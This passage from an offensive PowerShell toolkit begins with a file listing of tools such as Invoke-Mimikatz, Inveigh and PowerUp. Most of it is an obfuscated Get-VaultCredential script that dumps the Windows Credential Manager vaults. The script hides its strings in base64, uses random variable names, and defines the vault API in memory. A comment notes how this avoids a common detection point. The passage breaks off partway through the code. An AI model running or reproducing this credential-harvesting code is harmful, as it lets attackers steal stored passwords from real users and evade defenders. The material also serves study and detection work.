├── Get-VaultCredential.ps1 ├── Inveigh-BruteForce.ps1 ├── Inveigh-Relay.ps1 ├── Inveigh.ps1 ├── Invoke-GPPPassword.ps1 ├── Invoke-Mimikatz.ps1 ├── Invoke-NinjaCopy.ps1 ├── Invoke-RelfectivePEInjection.ps1 ├── Invoke-Shellcode.ps1 ├── Invoke-WmiCommand.ps1 ├── Persistence.ps1 ├── PowerUp.ps1 ├── PowerView.ps1 ├── README.md └── VolumeShadowCopyTools.ps1 /Get-VaultCredential.ps1: --------------------------------------------------------------------------------
# Get-VaultCredential
#
# Enumerates the current user's Windows Credential Manager vaults through the
# vault API of vaultcli.dll (VaultEnumerateVaults / VaultOpenVault /
# VaultEnumerateItems / VaultGetItem / VaultFree / VaultCloseVault, all declared
# below with DefinePInvokeMethod) and emits one PSObject per stored item with the
# properties Vault, Resource, Identity, PackageSid, Credential and LastModified.
#
# This is an obfuscated build: every local variable carries a random GUID-style
# name and every string literal (type names, field names, API names, library
# name, vault display names) is stored as base64-encoded UTF-16LE and decoded at
# run time with [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(..)).
# The decoded strings are not repeated in these comments; the structure is:
#   1. read [Environment]::OSVersion and keep Major/Minor for two version gates;
#   2. build a Run-mode dynamic assembly with Reflection.Emit: two Int32 enums,
#      two value types (the vault item, whose field list depends on the version
#      gate, and an explicit-layout item element) and one class that holds the
#      P/Invoke declarations;
#   3. define a local helper that reads a typed value out of an item element;
#   4. walk every vault and every item, resolve element values, free the
#      per-item buffer and close the vault handle.
#
# Detection-relevant: the P/Invoke surface is created in memory with
# DefineDynamicAssembly/DefinePInvokeMethod rather than Add-Type, and the only
# plain-text API names in the script are the call sites
# (::VaultEnumerateVaults, ::VaultOpenVault, ::VaultEnumerateItems,
# ::VaultGetItem, ::VaultFree, ::VaultCloseVault).
#
# Parameters: none ([CmdletBinding()] only, so -Verbose/-ErrorAction apply).
# Returns: PSObjects whose first type name is set from a decoded string.
# Raises: throws only when the initial VaultEnumerateVaults call fails; a vault
#         or item that cannot be opened/read produces Write-Error and is skipped.
function Get-VaultCredential
{
    [CmdletBinding()] Param()
    # OS version split into Major/Minor; both gates below are
    # "Major -ge 6 -and Minor -ge 2".
    ${1280d28a4cc6471db5b1eef88609e343} = [Environment]::OSVersion.Version
    ${bd40dfe484f544f5ac49b71a65f7b35a} = ${1280d28a4cc6471db5b1eef88609e343}.Major
    ${9cad0d1e6b2e48439dde28800f64a4c9} = ${1280d28a4cc6471db5b1eef88609e343}.Minor
    # In-memory (Run-only) dynamic assembly and module that will host the
    # enums, structs and P/Invoke class defined below.
    ${53cbce4b052e4e39a8b63eadcbf809dd} = New-Object System.Reflection.AssemblyName($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AFUAdABpAGwA'))))
    ${5e50cb66d1a348a7845c7f446475467d} = [AppDomain]::CurrentDomain.DefineDynamicAssembly(${53cbce4b052e4e39a8b63eadcbf809dd}, [Reflection.Emit.AssemblyBuilderAccess]::Run)
    ${c82ba4aabf1e49a4808fe79eb5673a0c} = ${5e50cb66d1a348a7845c7f446475467d}.DefineDynamicModule($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AFUAdABpAGwA'))), $False)
    # Enum 1: element value type. The literal names are used verbatim later as
    # switch labels in Get-VaultElementValue (String, Boolean, Short,
    # UnsignedShort, Int, UnsignedInt, Double, Guid, Sid, ByteArray, TimeStamp,
    # ProtectedArray, Attribute, Last); values -1..13.
    ${6c9cec1398574859bcfc2982421440cc} = ${c82ba4aabf1e49a4808fe79eb5673a0c}.DefineEnum($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AEwAaQBiAC4AVgBBAFUATABUAF8ARQBMAEUATQBFAE4AVABfAFQAWQBQAEUA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))), [Int32])
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGQAZQBmAGkAbgBlAGQA'))), -1)
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QgBvAG8AbABlAGEAbgA='))), 0)
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBoAG8AcgB0AA=='))), 1)
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAHMAaQBnAG4AZQBkAFMAaABvAHIAdAA='))), 2)
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHQA'))), 3)
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAHMAaQBnAG4AZQBkAEkAbgB0AA=='))), 4)
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABvAHUAYgBsAGUA'))), 5)
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwB1AGkAZAA='))), 6)
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AHIAaQBuAGcA'))), 7)
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QgB5AHQAZQBBAHIAcgBhAHkA'))), 8)
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABpAG0AZQBTAHQAYQBtAHAA'))), 9)
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAByAG8AdABlAGMAdABlAGQAQQByAHIAYQB5AA=='))), 10)
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB0AHQAcgBpAGIAdQB0AGUA'))), 11)
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAGQA'))), 12)
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABhAHMAdAA='))), 13)
    # Materialised element-type enum; referenced as ${62f0...}::<Name> below.
    ${62f0aacddeff4a369deda8333279ef46} = ${6c9cec1398574859bcfc2982421440cc}.CreateType()
    # Enum 2: schema element id (values 0..5, 100 and 10000). Only used as the
    # type of the first field of the item-element struct.
    ${6c9cec1398574859bcfc2982421440cc} = ${c82ba4aabf1e49a4808fe79eb5673a0c}.DefineEnum($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AEwAaQBiAC4AVgBBAFUATABUAF8AUwBDAEgARQBNAEEAXwBFAEwARQBNAEUATgBUAF8ASQBEAA=='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))), [Int32])
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBsAGwAZQBnAGEAbAA='))), 0)
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAHMAbwB1AHIAYwBlAA=='))), 1)
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBkAGUAbgB0AGkAdAB5AA=='))), 2)
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAaABlAG4AdABpAGMAYQB0AG8AcgA='))), 3)
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABhAGcA'))), 4)
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABhAGMAawBhAGcAZQBTAGkAZAA='))), 5)
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBwAHAAUwB0AGEAcgB0AA=='))), 100)
    $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBwAHAARQBuAGQA'))), 10000)
    ${c25a0c27aa41423b88af4de05ab1b339} = ${6c9cec1398574859bcfc2982421440cc}.CreateType()
    # [StructLayout(LayoutKind.Explicit, CharSet = CharSet.Ansi)] built by hand
    # as a CustomAttributeBuilder; applied to the item-element struct only.
    ${007ccd859840494b96bfcd68c4597e38} = [Runtime.InteropServices.StructLayoutAttribute].GetConstructor([Runtime.InteropServices.LayoutKind])
    ${3adf2af46bd2443c91bbee93b83d1e5c} = [Runtime.InteropServices.StructLayoutAttribute].GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBoAGEAcgBTAGUAdAA='))))
    ${ab2cc37671a44046bead3b62dcbc031d} = New-Object Reflection.Emit.CustomAttributeBuilder(${007ccd859840494b96bfcd68c4597e38},
        @([Runtime.InteropServices.LayoutKind]::Explicit),
        ${3adf2af46bd2443c91bbee93b83d1e5c},
        @([Runtime.InteropServices.CharSet]::Ansi))
    # Decoded TypeAttributes string shared by the two struct definitions.
    ${c058e66cd16247278bc23e37ea98c46d} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
    # Struct 1: the vault item (packing 4). Field order matters for marshalling;
    # the field names used later in plain text are SchemaId, pResourceElement,
    # pIdentityElement, pAuthenticatorElement, pPackageSid (version-gated) and
    # LastModified.
    ${2d25dc08941f4c53ab659ba6c06f3f79} = ${c82ba4aabf1e49a4808fe79eb5673a0c}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AEwAaQBiAC4AVgBBAFUATABUAF8ASQBUAEUATQA='))), ${c058e66cd16247278bc23e37ea98c46d}, [Object], [System.Reflection.Emit.PackingSize]::Size4)
    $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBtAGEASQBkAA=='))), [Guid], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))
    $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cABzAHoAQwByAGUAZABlAG4AdABpAGEAbABGAHIAaQBlAG4AZABsAHkATgBhAG0AZQA='))), [IntPtr], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))
    $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cABSAGUAcwBvAHUAcgBjAGUARQBsAGUAbQBlAG4AdAA='))), [IntPtr], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))
    $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cABJAGQAZQBuAHQAaQB0AHkARQBsAGUAbQBlAG4AdAA='))), [IntPtr], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))
    $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cABBAHUAdABoAGUAbgB0AGkAYwBhAHQAbwByAEUAbABlAG0AZQBuAHQA'))), [IntPtr], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))
    # Version gate 1: the extra pPackageSid field exists only when BOTH
    # Major >= 6 and Minor >= 2. NOTE(review): the expression is false for any
    # version whose Minor is below 2 (a 10.0 version included) — confirm that
    # matches the intended OS split.
    if (${bd40dfe484f544f5ac49b71a65f7b35a} -ge 6 -and ${9cad0d1e6b2e48439dde28800f64a4c9} -ge 2)
    {
        $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cABQAGEAYwBrAGEAZwBlAFMAaQBkAA=='))), [IntPtr], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))
    }
    $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABhAHMAdABNAG8AZABpAGYAaQBlAGQA'))), [UInt64], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))
    $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZAB3AEYAbABhAGcAcwA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))
    $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZAB3AFAAcgBvAHAAZQByAHQAaQBlAHMAQwBvAHUAbgB0AA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))
    $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cABQAHIAbwBwAGUAcgB0AHkARQBsAGUAbQBlAG4AdABzAA=='))), [IntPtr], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))
    # Materialised vault-item type; used with PtrToStructure/SizeOf in the loop.
    ${f2d61ec8abbe45409ddbd8773eb71409} = ${2d25dc08941f4c53ab659ba6c06f3f79}.CreateType()
    # Struct 2: item element, explicit layout — schema element id (enum 2) at
    # offset 0 and the element type (enum 1, plain-text field name "Type") at
    # offset 8. No value field is declared; Get-VaultElementValue reads the
    # value from a fixed offset instead.
    ${2d25dc08941f4c53ab659ba6c06f3f79} = ${c82ba4aabf1e49a4808fe79eb5673a0c}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AEwAaQBiAC4AVgBBAFUATABUAF8ASQBUAEUATQBfAEUATABFAE0ARQBOAFQA'))), ${c058e66cd16247278bc23e37ea98c46d})
    ${2d25dc08941f4c53ab659ba6c06f3f79}.SetCustomAttribute(${ab2cc37671a44046bead3b62dcbc031d})
    $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBtAGEARQBsAGUAbQBlAG4AdABJAGQA'))), ${c25a0c27aa41423b88af4de05ab1b339}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))).SetOffset(0)
    $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAB5AHAAZQA='))), ${62f0aacddeff4a369deda8333279ef46}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))).SetOffset(8)
    ${f95b2aeb23794d24a9cc41fe39510798} = ${2d25dc08941f4c53ab659ba6c06f3f79}.CreateType()
    # P/Invoke class. Each DefinePInvokeMethod call takes: method name, library
    # name, method attributes (all three decoded strings), calling convention,
    # return type ([Int32] status code), parameter types, native calling
    # convention (Winapi) and CharSet (Auto). The builder result ${dfbd...} is
    # overwritten each time and never used.
    ${2d25dc08941f4c53ab659ba6c06f3f79} = ${c82ba4aabf1e49a4808fe79eb5673a0c}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AEwAaQBiAC4AVgBhAHUAbAB0AGMAbABpAA=='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAEMAbABhAHMAcwA='))))
    # VaultOpenVault(ref Guid, UInt32, ref IntPtr handle)
    ${dfbdc08c26294e219dae2251b5705987} = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefinePInvokeMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AE8AcABlAG4AVgBhAHUAbAB0AA=='))),
        $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dgBhAHUAbAB0AGMAbABpAC4AZABsAGwA'))),
        $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA=='))),
        [Reflection.CallingConventions]::Standard,
        [Int32],
        [Type[]] @([Guid].MakeByRefType(),
            [UInt32],
            [IntPtr].MakeByRefType()),
        [Runtime.InteropServices.CallingConvention]::Winapi,
        [Runtime.InteropServices.CharSet]::Auto)
    # VaultCloseVault(ref IntPtr handle)
    ${dfbdc08c26294e219dae2251b5705987} = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefinePInvokeMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AEMAbABvAHMAZQBWAGEAdQBsAHQA'))),
        $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dgBhAHUAbAB0AGMAbABpAC4AZABsAGwA'))),
        $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA=='))),
        [Reflection.CallingConventions]::Standard,
        [Int32],
        [Type[]] @([IntPtr].MakeByRefType()),
        [Runtime.InteropServices.CallingConvention]::Winapi,
        [Runtime.InteropServices.CharSet]::Auto)
    # VaultFree(IntPtr buffer)
    ${dfbdc08c26294e219dae2251b5705987} = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefinePInvokeMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AEYAcgBlAGUA'))),
        $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dgBhAHUAbAB0AGMAbABpAC4AZABsAGwA'))),
        $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA=='))),
        [Reflection.CallingConventions]::Standard,
        [Int32],
        [Type[]] @([IntPtr]),
        [Runtime.InteropServices.CallingConvention]::Winapi,
        [Runtime.InteropServices.CharSet]::Auto)
    # VaultEnumerateVaults(Int32 flags, ref Int32 count, ref IntPtr guidArray)
    ${dfbdc08c26294e219dae2251b5705987} = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefinePInvokeMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AEUAbgB1AG0AZQByAGEAdABlAFYAYQB1AGwAdABzAA=='))),
        $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dgBhAHUAbAB0AGMAbABpAC4AZABsAGwA'))),
        $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA=='))),
        [Reflection.CallingConventions]::Standard,
        [Int32],
        [Type[]] @([Int32],
            [Int32].MakeByRefType(),
            [IntPtr].MakeByRefType()),
        [Runtime.InteropServices.CallingConvention]::Winapi,
        [Runtime.InteropServices.CharSet]::Auto)
    # VaultEnumerateItems(IntPtr handle, Int32 flags, ref Int32 count, ref IntPtr itemArray)
    ${dfbdc08c26294e219dae2251b5705987} = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefinePInvokeMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AEUAbgB1AG0AZQByAGEAdABlAEkAdABlAG0AcwA='))),
        $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dgBhAHUAbAB0AGMAbABpAC4AZABsAGwA'))),
        $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA=='))),
        [Reflection.CallingConventions]::Standard,
        [Int32],
        [Type[]] @([IntPtr],
            [Int32],
            [Int32].MakeByRefType(),
            [IntPtr].MakeByRefType()),
        [Runtime.InteropServices.CallingConvention]::Winapi,
        [Runtime.InteropServices.CharSet]::Auto)
    # Version gate 2 (same expression as gate 1): VaultGetItem is declared with
    # 8 parameters (an extra IntPtr for the package SID) or with 7. The call
    # sites in the item loop mirror this split, so the two gates must agree.
    if (${bd40dfe484f544f5ac49b71a65f7b35a} -ge 6 -and ${9cad0d1e6b2e48439dde28800f64a4c9} -ge 2)
    {
        ${dfbdc08c26294e219dae2251b5705987} = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefinePInvokeMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AEcAZQB0AEkAdABlAG0A'))),
            $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dgBhAHUAbAB0AGMAbABpAC4AZABsAGwA'))),
            $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA=='))),
            [Reflection.CallingConventions]::Standard,
            [Int32],
            [Type[]] @([IntPtr],
                [Guid].MakeByRefType(),
                [IntPtr],
                [IntPtr],
                [IntPtr],
                [IntPtr],
                [Int32],
                [IntPtr].MakeByRefType()),
            [Runtime.InteropServices.CallingConvention]::Winapi,
            [Runtime.InteropServices.CharSet]::Auto)
    }
    else
    {
        ${dfbdc08c26294e219dae2251b5705987} = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefinePInvokeMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AEcAZQB0AEkAdABlAG0A'))),
            $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dgBhAHUAbAB0AGMAbABpAC4AZABsAGwA'))),
            $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA=='))),
            [Reflection.CallingConventions]::Standard,
            [Int32],
            [Type[]] @([IntPtr],
                [Guid].MakeByRefType(),
                [IntPtr],
                [IntPtr],
                [IntPtr],
                [Int32],
                [IntPtr].MakeByRefType()),
            [Runtime.InteropServices.CallingConvention]::Winapi,
            [Runtime.InteropServices.CharSet]::Auto)
    }
    # Materialised P/Invoke class; all vault API calls below go through it.
    ${208b5b442263465081f8b114a5784fcf} = ${2d25dc08941f4c53ab659ba6c06f3f79}.CreateType()
    # Get-VaultElementValue — read the value stored in one item element.
    #   Parameter: a non-zero IntPtr to the element (ValidateScript rejects
    #              IntPtr::Zero with a parameter-binding error, so callers guard
    #              the pointer first).
    #   Returns:   a .NET value whose type follows the element's Type enum
    #              (string, bool, Int16, Int32, Double, Guid or SID string), or
    #              $null for the array/timestamp/attribute/last kinds.
    # The value is read at element + 16; only offsets 0 and 8 are declared in the
    # explicit-layout struct above, so the 16 is an undeclared layout assumption
    # — TODO confirm against the native element structure.
    function local:Get-VaultElementValue
    {
        Param (
            [ValidateScript({$_ -ne [IntPtr]::Zero})]
            [IntPtr]
            ${b1e5a2f6c5cb44889f16cdbad453cee8}
        )
        ${9ff8f33cd97542e083bf922c95412118} = [Runtime.InteropServices.Marshal]::PtrToStructure(${b1e5a2f6c5cb44889f16cdbad453cee8}, [Type] ${f95b2aeb23794d24a9cc41fe39510798})
        ${cc958e9142794654b131e8536c2f4fb8} = [IntPtr] (${b1e5a2f6c5cb44889f16cdbad453cee8}.ToInt64() + 16)
        switch (${9ff8f33cd97542e083bf922c95412118}.Type)
        {
            # String: the slot holds a pointer to a NUL-terminated UTF-16 string.
            ${62f0aacddeff4a369deda8333279ef46}::String {
                ${8117cf6ab60f426a8bae1c51945fdf90} = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] ${cc958e9142794654b131e8536c2f4fb8})
                [Runtime.InteropServices.Marshal]::PtrToStringUni([IntPtr] ${8117cf6ab60f426a8bae1c51945fdf90})
            }
            ${62f0aacddeff4a369deda8333279ef46}::Boolean {
                [Bool] [Runtime.InteropServices.Marshal]::ReadByte([IntPtr] ${cc958e9142794654b131e8536c2f4fb8})
            }
            ${62f0aacddeff4a369deda8333279ef46}::Short {
                [Runtime.InteropServices.Marshal]::ReadInt16([IntPtr] ${cc958e9142794654b131e8536c2f4fb8})
            }
            # NOTE(review): UnsignedShort/UnsignedInt reuse the signed readers,
            # so values above the signed maximum are returned negative.
            ${62f0aacddeff4a369deda8333279ef46}::UnsignedShort {
                [Runtime.InteropServices.Marshal]::ReadInt16([IntPtr] ${cc958e9142794654b131e8536c2f4fb8})
            }
            ${62f0aacddeff4a369deda8333279ef46}::Int {
                [Runtime.InteropServices.Marshal]::ReadInt32([IntPtr] ${cc958e9142794654b131e8536c2f4fb8})
            }
            ${62f0aacddeff4a369deda8333279ef46}::UnsignedInt {
                [Runtime.InteropServices.Marshal]::ReadInt32([IntPtr] ${cc958e9142794654b131e8536c2f4fb8})
            }
            ${62f0aacddeff4a369deda8333279ef46}::Double {
                [Runtime.InteropServices.Marshal]::PtrToStructure(${cc958e9142794654b131e8536c2f4fb8}, [Type] [Double])
            }
            ${62f0aacddeff4a369deda8333279ef46}::Guid {
                [Runtime.InteropServices.Marshal]::PtrToStructure(${cc958e9142794654b131e8536c2f4fb8}, [Type] [Guid])
            }
            # Sid: the slot holds a pointer to a binary SID; the pointer value is
            # echoed to the verbose stream and the SID is returned as its SDDL
            # string (.Value).
            ${62f0aacddeff4a369deda8333279ef46}::Sid {
                ${5014340fe373496b8cd8c2eda1b91d68} = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] ${cc958e9142794654b131e8536c2f4fb8})
                Write-Verbose "0x$(${5014340fe373496b8cd8c2eda1b91d68}.ToString('X8'))"
                ${104d037834804cb7beb1454cda7a8b54} = [Security.Principal.SecurityIdentifier] ([IntPtr] ${5014340fe373496b8cd8c2eda1b91d68})
                ${104d037834804cb7beb1454cda7a8b54}.Value
            }
            # Remaining kinds are not decoded.
            ${62f0aacddeff4a369deda8333279ef46}::ByteArray { $null }
            ${62f0aacddeff4a369deda8333279ef46}::TimeStamp { $null }
            ${62f0aacddeff4a369deda8333279ef46}::ProtectedArray { $null }
            ${62f0aacddeff4a369deda8333279ef46}::Attribute { $null }
            ${62f0aacddeff4a369deda8333279ef46}::Last { $null }
        }
    }
    # Enumerate vault GUIDs: ${24c8...} receives the count, ${fe1f...} the
    # native array of GUIDs. A non-zero status is the only terminating error.
    # NOTE(review): this array (and each per-vault item array below) is never
    # handed back to VaultFree; only the per-item buffer is released.
    ${24c8469bf285440a875de4a34cd79305} = 0
    ${fe1f5f73019a4a60a1693a6969e3c20d} = [IntPtr]::Zero
    ${a75abc70368c44fcbb39ce9edca87f7c} = ${208b5b442263465081f8b114a5784fcf}::VaultEnumerateVaults(0, [Ref] ${24c8469bf285440a875de4a34cd79305}, [Ref] ${fe1f5f73019a4a60a1693a6969e3c20d})
    if (${a75abc70368c44fcbb39ce9edca87f7c} -ne 0)
    {
        throw "Unable to enumerate vaults. Error (0x$(${a75abc70368c44fcbb39ce9edca87f7c}.ToString('X8')))"
    }
    ${a182138fef914c68bf31f8516530b664} = ${fe1f5f73019a4a60a1693a6969e3c20d}
    # Lookup table: well-known vault GUID -> decoded display name. The all-zero
    # GUID maps to $null; an unknown GUID falls back to the GUID itself (line
    # with ContainsKey below).
    ${a49e774fea8b4e23905aabb599ed6413} = @{
        ([Guid] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MgBGADEAQQA2ADUAMAA0AC0AMAA2ADQAMQAtADQANABDAEYALQA4AEIAQgA1AC0AMwA2ADEAMgBEADgANgA1AEYAMgBFADUA')))) = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBpAG4AZABvAHcAcwAgAFMAZQBjAHUAcgBlACAATgBvAHQAZQA=')))
        ([Guid] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MwBDAEMARAA1ADQAOQA5AC0AOAA3AEEAOAAtADQAQgAxADAALQBBADIAMQA1AC0ANgAwADgAOAA4ADgARABEADMAQgA1ADUA')))) = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBpAG4AZABvAHcAcwAgAFcAZQBiACAAUABhAHMAcwB3AG8AcgBkACAAQwByAGUAZABlAG4AdABpAGEAbAA=')))
